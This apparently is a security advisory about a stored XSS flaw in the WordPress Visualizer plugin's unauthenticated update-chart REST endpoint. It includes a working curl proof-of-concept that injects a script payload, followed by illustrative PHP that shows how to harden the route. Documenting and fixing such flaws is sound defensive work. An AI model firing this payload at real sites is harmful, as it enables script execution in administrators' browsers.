By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify the metadata of an existing chart and inject an XSS payload that is stored and later executed when an admin goes to edit the chart.
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.158.128:8000' -H $'Content-Type: application/json' \
--data-binary $'{\"id\": 7, \"visualizer-chart-type\": \"\\\"><script>alert(1);</script><span data-x=\\\"\"}' \
$'http://192.168.158.128:8000/wp-json/visualizer/v1/update-chart'
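The root cause is a REST route that any caller can reach. The following is an added illustrative example, not the Visualizer plugin's code: it shows a route registered without a permission_callback next to a hardened version that checks the caller's capability on the target post, constrains the input, and escapes the value on output. Namespace, route, callback and meta key names are hypothetical.

```php
<?php
// Added illustrative example (not the Visualizer plugin's own code).
// Route, callback and meta key names are hypothetical.

// Weak: without a permission_callback the route is public, so an
// unauthenticated request reaches the handler and can write raw input.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/update-chart', array(
        'methods'  => 'POST',
        'callback' => function ( WP_REST_Request $request ) {
            $id = (int) $request->get_param( 'id' );
            update_post_meta( $id, 'example-chart-type', $request->get_param( 'chart-type' ) );
            return rest_ensure_response( array( 'updated' => $id ) );
        },
    ) );
} );

// Hardened: require edit rights on the specific chart post and sanitize
// the value before it is stored. Nonce/cookie auth is handled by WP core.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/update-chart-safe', array(
        'methods'             => 'POST',
        'callback'            => 'example_update_chart_safe',
        'permission_callback' => function ( WP_REST_Request $request ) {
            $id = (int) $request->get_param( 'id' );
            return $id > 0 && current_user_can( 'edit_post', $id );
        },
        'args' => array(
            'id'         => array( 'required' => true, 'type' => 'integer' ),
            'chart-type' => array(
                'required'          => true,
                'type'              => 'string',
                // Restricts the stored value to [a-z0-9_-], removing markup.
                'sanitize_callback' => 'sanitize_key',
            ),
        ),
    ) );
} );

function example_update_chart_safe( WP_REST_Request $request ) {
    $id = (int) $request->get_param( 'id' );
    update_post_meta( $id, 'example-chart-type', $request->get_param( 'chart-type' ) );
    return rest_ensure_response( array( 'updated' => $id ) );
}

// On the admin edit screen, escape on output as well: stored data may
// predate the sanitization, so output encoding is the last line of defense.
function example_render_chart_type( $id ) {
    $type = get_post_meta( $id, 'example-chart-type', true );
    printf( '<span data-chart-type="%s"></span>', esc_attr( $type ) );
}
```

Note that WordPress 5.5 and later emit a _doing_it_wrong notice for routes that omit permission_callback, but the route still stays reachable, so the notice is a signal to act on, not a mitigation.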
See the references for more details.
Nathan Davison
No
2019-09-28
2019-09-28
2020-09-22